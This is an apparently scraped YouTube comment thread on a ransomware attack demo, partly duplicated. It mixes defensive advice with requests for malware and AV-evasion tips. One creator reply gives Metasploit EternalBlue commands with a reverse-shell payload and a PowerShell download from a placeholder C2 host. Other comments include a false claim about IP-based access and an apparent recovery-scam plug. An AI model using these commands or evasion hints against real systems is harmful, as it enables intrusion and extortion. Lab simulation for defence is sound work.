There are multiple parts of the attack, during the first part using the Word doc, it was created from scratch by me. I can create another video on the details of the document. Thanks for watching. Stay informed and secure! Don’t forget to like, comment, and subscribe for more cybersecurity insights and live attack demos.
Hey mate the Infection-Simulation document that you used to maintained the connection and to upload the malware in the victim machine where did you get it from? (Educational purpose). Thanks.
There are multiple parts of the attack, during the first part using the Word doc, it was created from scratch by me. I can create another video on the details of the document. Thanks for watching. Stay informed and secure! Don’t forget to like, comment, and subscribe for more cybersecurity insights and live attack demos.
Its in the works, I should have more details to share in the coming weeks! Stay informed and secure! Don’t forget to like, comment, and subscribe for more cybersecurity insights and live attack demos.
Did this office have macros set to auto run? Usually you get an enable content message before running anytime of VBS, or did you embed some shell code in the .docx
Hi Lockard, sorry i have a few questions since i don't quite understand how you gotten access to the device? -Did opening the word document execute macros to gain access? -And does the user have local admin rights to execute them right away? - If it wasn't through macros, how did you get access from a different location/outside of the target network with having the user only opening the word document? How could this be prevented?
Hello, I am working on documentation about botnets and their threats to modern institutions as part of my apprenticeship. I was wondering if you could help me set this up as part of a practical showcase for my presentation. Kind regards, Leon
I would thank you if you could give a link to your research with all the commands you used for the persistence part, of course just for educational purposes
I currently do not have them published publicly, however that said, I'll be working on more content for the channel and will include more details and commands in the future. Stay informed and secure! Don’t forget to like, comment, and subscribe for more cybersecurity insights and live attack demos.
In this example, there is attack is a Reverse Shell connection. Meaning the victim's system is beaconing on to the Internet (Egress). Not sure if you noticed or not, but the first connection was over TCP port 443 HTTPS. Meaning if you drop all traffic outbound over 443, you may as well disconnect from the network because nothing will work. On the second connection, the outbound port was 53 DNS. Another big issue if you try and block DNS on your network. No BIND connection is being made, so I would hope and expect traffic is blocked inbound on those ports. Just know attackers (good ones), will leverage ports that MUST be open, like 53, 80, 443 to get their connections out of the network. Thanks for watching. Stay informed and secure! Don’t forget to like, comment, and subscribe for more cybersecurity insights and live attack demos.
Nice video, explanation and demonstration. I think you should try again against a computer who has a paid license of antivirus (e.g ESET etc). The free version Windows defender has nothing in order to defend any attack.
this is interesting technique and similar somehow to a signed malware with a company's private signing key typically to backdoor whitelisted applications. modern cyber sec are getting way more sophisticated than ever.
Thanks for the feedback, I use antiscan.me to test detections on the payloads, I also have the paid version of CrowdStrike I test with as well. I'll add this to the list of videos to make. Thanks for watching. Stay informed and secure! Don’t forget to like, comment, and subscribe for more cybersecurity insights and live attack demos.
Its a broken Macro technique, I recommend taking the OSEP training to learn more about this method. I avoid using crypters as they are easily flagged as suspicious.
The whole process begins with opening malicious file. Is it possible to identify the file as malicious with the default Windows Defender scan? If not, what else can a layman do to recognise which files are unsafe?
Great question, and unfortunately as seen in this demo, Defender isn't able to detect an issue. Therefore you could do a few thinks: 1. Scan for malware using trusted antivirus/anti-malware tools. 2. Use VirusTotal for file analysis, www.virustotal.com is the site, Google owns them. Great way to get an idea as to what the majority of security vendors have to say about the file in question. Just know, that everything uploaded to VirusTotal can be downloaded by anyone that request it. Most folks are security researchers who work for security companies that make Ant-Virus / EDR products and use these uploads to help improve their detection logic. So the take away is, you dont want any classified data in a document ending up uploaded to VirusTotal. antiscan.me is a similar site and they dont submit uploads to 3rd parties like VirusTotal does. Stay informed and secure! Don’t forget to like, comment, and subscribe for more cybersecurity insights and live attack demos.
I've kicked around a few ideas and yes there will be future videos to come on not just how to make them, but also how to evade detections from all the big name security tools.
Thanks for this demo. On question please, if the user is not a local admin and is unable to run the file after clicking, will the hack still be successful?
Hi, I'm sorry for the delayed response as I'm just now seeing your question. A non admin user would still be able to open this file. In doing so the malicious code would still run, however it would be in the context of the users permissions. When this happens, the attack much do a privilege escalation attack to get admin / root access.
Hi, I'm sorry for the delayed response as I'm just now seeing your question. No I do not, the main reason for that is so AV vendors doesn't pick up some of my methods. That said, this one already is being detected, which is expected over time. I'll consider creating move videos on the entire process, start to finish. Along with diving deeper into the code and methods used.
It becomes a whack-a-mole game at that point. We recommend ingesting threat intel on what are called IoCs (Indicators of Compromise) which you can block known bad sources and destinations. However, advanced malware can be set up to talk to not just IPs but URLs, which an attacker can easily change DNS records on the fly. They can also have multiple IPs and URLs to call out to, which makes blocking it on the firewall near impossible in some cases.
HI! I have been trying to simulate ransomware traffic for testing a countermeasure but I couldn't. How can I simulate wannacry ransomware traffic? Best Regards
Each ransomware is slightly different, but also slightly similar. Great question and wish I could have responded sooner. I'll create a video on this topic as well. In the mean time for Wannacry, do the following: Tools and Steps for Simulation: 1. Set Up a Controlled Environment: * Use a virtual lab with several Windows machines. * Ensure the environment is completely isolated from any production networks. 2. Simulate Infection Traffic: * Metasploit Framework: Use Metasploit to simulate the EternalBlue exploit used by WannaCry. Load Metasploit with the EternalBlue module: bash Copy code msfconsole use exploit/windows/smb/ms17_010_eternalblue set RHOST set PAYLOAD windows/x64/meterpreter/reverse_tcp set LHOST exploit * Emulate Ransomware Activity: Create custom scripts to simulate typical ransomware behavior without actually encrypting files. * Create a script to mimic the creation of ransom notes, registry modifications, and dummy file encryption (rename files instead of encrypting). * Generate network traffic to simulate command and control (C2) communication: powershell, Copy code: $WebClient = New-Object System.Net.WebClient $WebClient.DownloadString("your-c2-server.com/command") 3. Monitor and Analyze Traffic: * Use network monitoring tools like Wireshark to capture and analyze the simulated traffic. * Verify the detection of IOCs with your security tools (SIEM, IDS/IPS). 4. Deploy Detection and Prevention Measures: * Implement rules in your security tools to detect the IOCs listed above. * Test the effectiveness of your security measures in detecting and responding to the simulated ransomware activity. Thanks for watching. Stay informed and secure! Don’t forget to like, comment, and subscribe for more cybersecurity insights and live attack demos.
Thank you for this video. I need your help.. My laptop was exposed to a JAWR ransomware attack. I see that you are an expert in this field. I hope you can help me solve this complex problem. Thank you very much in advance
Sorry for the delay, I'm just now seeing your comment. I hope you were able to recover from that attack. Moving forward, I'll keep a closer eye on this channel as we start to create new content.
How did you make it without WinDef or AV noticing or alarming? Can u tell me in 1-2 sentences how this exploit works and what I need to do? (educational purposes only)
Hi, I'm sorry for the delayed response as I'm just now seeing your question. It requires creating the payload in away that is unique, without any suspicious indicators that would get flagged. Most crypters are easily detectable as suspicious,. It requires a lot of testing, trail and error. For example, the methods I used here no longer works, therefore you have to always continue to evolve the payloads to stay one step ahead of the detection engines.
Great and informative video! I’m a cybersecurity student, and I’d love to see how you disguised this malware script as a Word document without detection. For a university project (for learning purposes), I created a Trojan that establishes a reverse shell connection between the victim and the attacker, but I couldn’t embed it in a legitimate process.
This doc at the time was whats known as a FUD, meaning fully undetectable. However now just about all vendors flag it today. That said, I'll be recreating this video in the near future and will be showing it against all the major AV /' EDR vendors.
Thanks! Glad you enjoyed it, we'll be stepping up our response and content creation on this channel. Stay informed and secure! Don’t forget to like, comment, and subscribe for more cybersecurity insights and live attack demos.
True, bad actor is also on the list. But to be honest when I created this video I honestly thought it was going to be geared more toward NON security folks! How wrong was I, lol. Thanks for watching. Stay informed and secure! Don’t forget to like, comment, and subscribe for more cybersecurity insights and live attack demos.
Yes, you can reach out to www.lockardsecurity.com Thanks for watching. Stay informed and secure! Don’t forget to like, comment, and subscribe for more cybersecurity insights and live attack demos.
I would like to see how the ransomware was created (for ed purposes) so I can provide a debrief to a couple clients.
🤨🤨
Yeeees clients
IKIK
There are multiple parts of the attack, during the first part using the Word doc, it was created from scratch by me. I can create another video on the details of the document. Thanks for watching. Stay informed and secure! Don’t forget to like, comment, and subscribe for more cybersecurity insights and live attack demos.
@@lockardsecurity
Need more videos on the practical red team
You are explaining in the best way.
I request you to make more videos to learn from you
Thank you, I will
Hey mate the Infection-Simulation document that you used to maintained the connection and to upload the malware in the victim machine where did you get it from? (Educational purpose). Thanks.
There are multiple parts of the attack, during the first part using the Word doc, it was created from scratch by me. I can create another video on the details of the document. Thanks for watching. Stay informed and secure! Don’t forget to like, comment, and subscribe for more cybersecurity insights and live attack demos.
@@lockardsecuritywould be interesting to see the document park breakdown!
@@lockardsecurity What about the environment? can we use it please?
Do you have a paid course to be possible we learn step by step about this ?
Its in the works, I should have more details to share in the coming weeks! Stay informed and secure! Don’t forget to like, comment, and subscribe for more cybersecurity insights and live attack demos.
Thank you for everyting bro, have a good job.
Did this office have macros set to auto run? Usually you get an enable content message before running anytime of VBS, or did you embed some shell code in the .docx
Hi Lockard,
sorry i have a few questions since i don't quite understand how you gotten access to the device?
-Did opening the word document execute macros to gain access?
-And does the user have local admin rights to execute them right away?
- If it wasn't through macros, how did you get access from a different location/outside of the target network with having the user only opening the word document?
How could this be prevented?
Hello, I am working on documentation about botnets and their threats to modern institutions as part of my apprenticeship. I was wondering if you could help me set this up as part of a practical showcase for my presentation.
Kind regards,
Leon
I would thank you if you could give a link to your research with all the commands you used for the persistence part, of course just for educational purposes
I currently do not have them published publicly, however that said, I'll be working on more content for the channel and will include more details and commands in the future. Stay informed and secure! Don’t forget to like, comment, and subscribe for more cybersecurity insights and live attack demos.
just drop all inbound connections on port 5985 & 5986 to prevent this?
In this example, there is attack is a Reverse Shell connection. Meaning the victim's system is beaconing on to the Internet (Egress). Not sure if you noticed or not, but the first connection was over TCP port 443 HTTPS. Meaning if you drop all traffic outbound over 443, you may as well disconnect from the network because nothing will work. On the second connection, the outbound port was 53 DNS. Another big issue if you try and block DNS on your network. No BIND connection is being made, so I would hope and expect traffic is blocked inbound on those ports. Just know attackers (good ones), will leverage ports that MUST be open, like 53, 80, 443 to get their connections out of the network. Thanks for watching. Stay informed and secure! Don’t forget to like, comment, and subscribe for more cybersecurity insights and live attack demos.
Which kali tool did you used?
Is there any way you can show how to make the word doccument and the actual ransomware script? Aswell as a list of the commands you used?
Could this be prevented by a hardware firewall?
Nice video, explanation and demonstration.
I think you should try again against a computer who has a paid license of antivirus (e.g ESET etc).
The free version Windows defender has nothing in order to defend any attack.
this is interesting technique and similar somehow to a signed malware with a company's private signing key typically to backdoor whitelisted applications. modern cyber sec are getting way more sophisticated than ever.
I Was Also Looking For That Type Of Videos Bro 🥲
Thanks for the feedback, I use antiscan.me to test detections on the payloads, I also have the paid version of CrowdStrike I test with as well. I'll add this to the list of videos to make. Thanks for watching. Stay informed and secure! Don’t forget to like, comment, and subscribe for more cybersecurity insights and live attack demos.
Start with the full video so I learn how to create the payload and listener
I'll be creating an updated video with full end to end which will show the latest and greatest processes and methods.
i assume you made a backdoor first, just how do you crypt it in kali linux plus exploit?
Its a broken Macro technique, I recommend taking the OSEP training to learn more about this method. I avoid using crypters as they are easily flagged as suspicious.
@@lockardsecurity okay thanks lol
@@lockardsecurityI want to learn more about hacking can you make a discord by anychance
Can you make a video how to protect from these type of attacks?
The whole process begins with opening malicious file. Is it possible to identify the file as malicious with the default Windows Defender scan? If not, what else can a layman do to recognise which files are unsafe?
Great question, and unfortunately as seen in this demo, Defender isn't able to detect an issue. Therefore you could do a few thinks:
1. Scan for malware using trusted antivirus/anti-malware tools.
2. Use VirusTotal for file analysis, www.virustotal.com is the site, Google owns them. Great way to get an idea as to what the majority of security vendors have to say about the file in question. Just know, that everything uploaded to VirusTotal can be downloaded by anyone that request it. Most folks are security researchers who work for security companies that make Ant-Virus / EDR products and use these uploads to help improve their detection logic. So the take away is, you dont want any classified data in a document ending up uploaded to VirusTotal. antiscan.me is a similar site and they dont submit uploads to 3rd parties like VirusTotal does.
Stay informed and secure! Don’t forget to like, comment, and subscribe for more cybersecurity insights and live attack demos.
@@lockardsecurity thank you for taking the time, this was very informative.
Can you make a tutorial on how to create such ransomware?(Love your content)
lol
I've kicked around a few ideas and yes there will be future videos to come on not just how to make them, but also how to evade detections from all the big name security tools.
@@lockardsecurity guess we will wait
Thanks for this demo. On question please, if the user is not a local admin and is unable to run the file after clicking, will the hack still be successful?
Hi, I'm sorry for the delayed response as I'm just now seeing your question. A non admin user would still be able to open this file. In doing so the malicious code would still run, however it would be in the context of the users permissions. When this happens, the attack much do a privilege escalation attack to get admin / root access.
Hey! It's an absolute amazing video..but how can i get this codes..for my Ransomware project?can u reply pls.
hello i wanted to simulate the above attack for a clg project can anyone help me ?
Sir can i have a copy ofnthat simulation? For educational purposes, im into cybersec right now
What kind of mail you are using ? How can I use it ? Is it free ?
Is tempmail
in that example it was mailinator
do you have a video where you put the malicious code into the macro file? Thank you
Hi, I'm sorry for the delayed response as I'm just now seeing your question. No I do not, the main reason for that is so AV vendors doesn't pick up some of my methods. That said, this one already is being detected, which is expected over time. I'll consider creating move videos on the entire process, start to finish. Along with diving deeper into the code and methods used.
how to remove ransomware??
same question tried all decryption methods but not work 😢😢
cause u can't only the one who puts it in the system who can which u gonna need to pay for
I love this video ❤
I love the video!!
Thanks for watching, please like, share and subscribe as we'll be releasing more videos like this in the near future!
Hey guys hacker's control ransom with a C&C server?
Thats right!
how did you get access to the targets computer?
The link the victim clicked gave away the IP address, and with the IP, the hacker can basically access the victim.
@@KnightMagnetso a Firewall rule will block this connection?
@@TK-od8hdonly if the attacker IP was known beforehand and it was put in the rule
It becomes a whack-a-mole game at that point. We recommend ingesting threat intel on what are called IoCs (Indicators of Compromise) which you can block known bad sources and destinations. However, advanced malware can be set up to talk to not just IPs but URLs, which an attacker can easily change DNS records on the fly. They can also have multiple IPs and URLs to call out to, which makes blocking it on the firewall near impossible in some cases.
how to disable antivirus before infecting?
Each AV has its own steps to follow, most are been controlled via Registry or the running process memory space.
@@lockardsecurity Ok. Windows Defender for example, can it be disabled through the malware itself?
HI! I have been trying to simulate ransomware traffic for testing a countermeasure but I couldn't. How can I simulate wannacry ransomware traffic?
Best Regards
Each ransomware is slightly different, but also slightly similar. Great question and wish I could have responded sooner. I'll create a video on this topic as well. In the mean time for Wannacry, do the following:
Tools and Steps for Simulation:
1. Set Up a Controlled Environment:
* Use a virtual lab with several Windows machines.
* Ensure the environment is completely isolated from any production networks.
2. Simulate Infection Traffic:
* Metasploit Framework: Use Metasploit to simulate the EternalBlue exploit used by WannaCry.
Load Metasploit with the EternalBlue module:
bash
Copy code
msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOST
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST
exploit
* Emulate Ransomware Activity: Create custom scripts to simulate typical ransomware behavior without actually encrypting files.
* Create a script to mimic the creation of ransom notes, registry modifications, and dummy file encryption (rename files instead of encrypting).
* Generate network traffic to simulate command and control (C2) communication:
powershell, Copy code:
$WebClient = New-Object System.Net.WebClient
$WebClient.DownloadString("your-c2-server.com/command")
3. Monitor and Analyze Traffic:
* Use network monitoring tools like Wireshark to capture and analyze the simulated traffic.
* Verify the detection of IOCs with your security tools (SIEM, IDS/IPS).
4. Deploy Detection and Prevention Measures:
* Implement rules in your security tools to detect the IOCs listed above.
* Test the effectiveness of your security measures in detecting and responding to the simulated ransomware activity.
Thanks for watching. Stay informed and secure! Don’t forget to like, comment, and subscribe for more cybersecurity insights and live attack demos.
how about if you have a DYNAMIC IP ADDRESS? will ransomware be possible?
Yes
Yes, in this case, the ransomware will act more like a worm, scan the entire network and attempt to spread to all hosts that appear to be up.
It's Kali Linux
Yes, that is right!
How do you make this Word Document without Makros?
Its a broken Macro technique. I recommend taking the OSEP training to learn more about this method.
Thank you for this video. I need your help.. My laptop was exposed to a JAWR ransomware attack. I see that you are an expert in this field. I hope you can help me solve this complex problem. Thank you very much in advance
Sorry for the delay, I'm just now seeing your comment. I hope you were able to recover from that attack. Moving forward, I'll keep a closer eye on this channel as we start to create new content.
Hi bro
If a pc is infected with ransomeware virus how to decrypt it please do a video
you can't, pay or format your pc
How did you make it without WinDef or AV noticing or alarming? Can u tell me in 1-2 sentences how this exploit works and what I need to do? (educational purposes only)
crypter
Hi, I'm sorry for the delayed response as I'm just now seeing your question. It requires creating the payload in away that is unique, without any suspicious indicators that would get flagged. Most crypters are easily detectable as suspicious,. It requires a lot of testing, trail and error. For example, the methods I used here no longer works, therefore you have to always continue to evolve the payloads to stay one step ahead of the detection engines.
Great and informative video! I’m a cybersecurity student, and I’d love to see how you disguised this malware script as a Word document without detection. For a university project (for learning purposes), I created a Trojan that establishes a reverse shell connection between the victim and the attacker, but I couldn’t embed it in a legitimate process.
does kaspersky allow opening the infected word-doc in the beginning of the vid? i dont think so so its preventing the ransomware attack?
That probably all depends on the exploit in the doc
This doc at the time was whats known as a FUD, meaning fully undetectable. However now just about all vendors flag it today. That said, I'll be recreating this video in the near future and will be showing it against all the major AV /' EDR vendors.
bro this is so good
Thanks! Glad you enjoyed it, we'll be stepping up our response and content creation on this channel. Stay informed and secure! Don’t forget to like, comment, and subscribe for more cybersecurity insights and live attack demos.
Je parie que personne ne saurait m'envoyer un ransomware 😂
give me the google sheet documents
You don't want it :D
Hello Lord, I have final project tomotrow, and I need to demonstrate this attack to get bonus points, I really need this. Can you help me, plsss?!!
Dang, I'm just now seeing this comment! Hope you were able to do demonstrate this for your class.
broo help me out. im going through the same thingg
@@thewickedmmahello bro can I get your attention
who would use windows ge
Muito boa apresentação!!
This PC did not have any Antivirus… if there is corporate antivirus would this be avoided???
So you don’t go to jail y’all, hack a vm lol
To be clear its my VM, and you can hack your own stuff, providing you give yourself permission to do so lol!
Daamn this is so evil
Hey there how i can get this virus ??
how you make thisundetectable payload
Instead of “hacker” you should say cyber criminal.
generally its hacker
True, bad actor is also on the list. But to be honest when I created this video I honestly thought it was going to be geared more toward NON security folks! How wrong was I, lol. Thanks for watching. Stay informed and secure! Don’t forget to like, comment, and subscribe for more cybersecurity insights and live attack demos.
Hi, can i contact you pls
Yes, you can reach out to www.lockardsecurity.com
Thanks for watching. Stay informed and secure! Don’t forget to like, comment, and subscribe for more cybersecurity insights and live attack demos.
@proteckdiamond resolveu o problema do ransomware pela primeira vez em l.G
how can i get a ransomware tools my friend is asking for educational purpose...